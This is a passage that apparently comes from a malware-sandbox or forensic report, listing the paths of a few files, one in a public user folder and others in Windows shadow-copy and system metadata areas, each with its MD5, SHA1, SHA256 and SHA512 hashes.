| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Public\w8q31a55
| MD5 | 413c537a29057c20d16dbfc3d1b98bec |
| SHA1 | a478c3e5ca2409704bef0ab7784e24061924d2eb |
| SHA256 | b25f851e1dd7c3fc5a9c5d7988f97df322842ff070e5c7d3cec2f2d96fd2652f |
| SHA512 | b560e879328ac19c718517e4d217566d7f1b42136b1cf1c106333a494b94dd615084920d0c43aebf380da2b53220d6fff9fd0e1ecb32903f08cb8af6ad923ab8 |
\??\Volume{1385018a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{13f7becd-e178-49a3-bf0d-e259aeb85ef4}_OnDiskSnapshotProp
| MD5 | 3f87d04f3ba551fd9a3473bb87853164 |
| SHA1 | affb3fa4e198c067f7bf8cbeae5d67c1a659f17c |
| SHA256 | 85196e5f7df5d6887939d36eed590ad9b6cd7936f60abdd8bfa97b83c61268d8 |
| SHA512 | a42e80b5dc3997c7a4cc5cec5e97a58f1ed929a6357c707e337ec3f9f1b981f0c29480bc26280cee57a9e9bed41cee3c09c862d2cc7a53460ed0703d5fc4bed6 |
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\System Volume Information\SPP\metadata-2
| MD5 | 5bed808b118157c8035fdd4f692c5925 |
| SHA1 | 54eb69191ec588eb392f53272a99367841adc191 |
| SHA256 | cc6e519f98b139fdcf386f527329083687682a05db7c88a255817be0d124c602 |
| SHA512 | 543fe1a56d4a7423cc693ac2c56917979b26920673e41c6f52d0a9fdf22c4c4f01bce28b58f8d7e3904ef2dcbd92bf7f51326e0399e0adb0c3f1d21c2029b8d9 |